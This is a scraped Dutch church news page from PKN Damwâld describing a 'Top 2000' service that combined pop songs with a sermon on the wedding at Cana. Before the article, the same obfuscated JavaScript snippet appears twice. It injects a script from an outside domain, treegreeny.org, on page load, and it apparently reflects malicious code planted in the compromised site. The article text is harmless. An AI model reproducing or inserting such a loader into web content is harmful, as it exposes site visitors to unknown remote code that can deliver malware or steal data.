;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Top 2000 dienst ... een prachtige beleving! - PKN Damwâld

Top 2000 dienst … een prachtige beleving!

Gepubliceerd op: maandag 16 oktober

Van Frans Halsema, The Moody Blues tot Adele, van Blöf tot Coldplay … afgelopen zondagavond namen ds. Gerard Rinsma en gospelrockband Grace met een aanstekelijk enthousiasme het talrijk opgekomen publiek mee in een mooie mix van een kerkdienst en popmuziek. Deze Top 2000 kerkdienst, die georganiseerd werd door de evangelisatiecommissie van beide PKN-kerken in Damwâld, bleek een kerkdienst te zijn om mee te zingen, om mee te swingen, maar toch ook een muzikale Bijbelse belevingstocht. Aan de hand van ondermeer het bekende Bijbelverhaal ‘Jezus verandert water in wijn’ (Johannes 2: 1-12) en met een koppeling aan de persoolijke ondervindingen van alle dag, werd een boeiende soundtrack van het leven geschetst.

De soundtrack van het leven … deze popsongdienst leverde een verrassende verbinding op tussen de wereld van geloof, God en de Bijbel en een aantal heerlijk herkenbare popsongs. Met nummers vol emoties, liedjes die je kippenvel geven en die herinneringen bij je oproepen. Sommige liederen bleken expliciet over geloof of God te gaan en andere liederen die juist weer over belangrijke levenservaringen als liefde, dood en troost handelden. Bijzonder was het om in zo’n anders-dan-anders-kerkdienst te ervaren dat door popsongs te ontleden en te zingen vragen over het geloof, over wie jezelf bent en waar je juist altijd geborgenheid kunt/mag vinden ineens in een heel ander licht komen te staan … een impuls, nieuwe inspiratie en motivatie in je (geloofs-) leven.